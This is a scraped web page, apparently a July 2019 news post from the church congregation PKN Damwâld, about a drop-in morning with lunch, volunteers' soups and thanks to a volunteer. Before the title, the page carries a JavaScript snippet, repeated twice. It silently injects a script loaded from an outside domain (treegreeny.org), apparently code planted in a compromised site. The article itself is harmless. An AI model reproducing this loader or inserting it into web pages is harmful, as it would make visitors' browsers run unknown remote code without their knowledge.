;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inloop met lunch ! - PKN Damwâld

Inloop met lunch !

Gepubliceerd op: donderdag 25 juli 2019

Op donderdag 18 juli was er weer inloop van It Trefpunt en die werd deze afgesloten met een lunch. Ondanks de vakantieperiode waren er toch veel deelnemers en met vrijwilligers ongeveer 35 totaal. Zoals gebruikelijk was er soep, gemaakt door 2 vrijwilligers namelijk Pietje en Faten die respectievelijk ossenstaart- en een soort linzensoep hadden gemaakt. Die van Pietje ging er weer in als vanouds, maar dat gold ook voor de Syrische linzen van Faten. Dames enorm bedankt voor jullie inzet en vakmanschap!! Naast brood, broodjes en (karne)melk was er deze keer voor iedereen een kroket of frikadel. Fruit van onze vaste leverancier en enige en echte groenteman ontbrak natuurlijk niet. Het werd allemaal erg gewaardeerd door onze gasten die zeer tevreden en vol(daan) huiswaarts gingen. Verder is die ochtend nog een volgend extra uitje aan de orde geweest en dat gaan we plannen in september. We hebben Faten nog bedankt en verrast met enkele cadeaubonnen. Zij had ons allen namelijk tijdens een eerdere inloop getrakteerd op heel veel verschillende Syrische hapjes die er bij iedereen ingingen als…….
Dus voor herhaling vatbaar!! Nieuwsgierig geworden naar onze inloopochtenden? De eerstvolgende is op donderdag 1 augustus, vanaf 9.30 uur.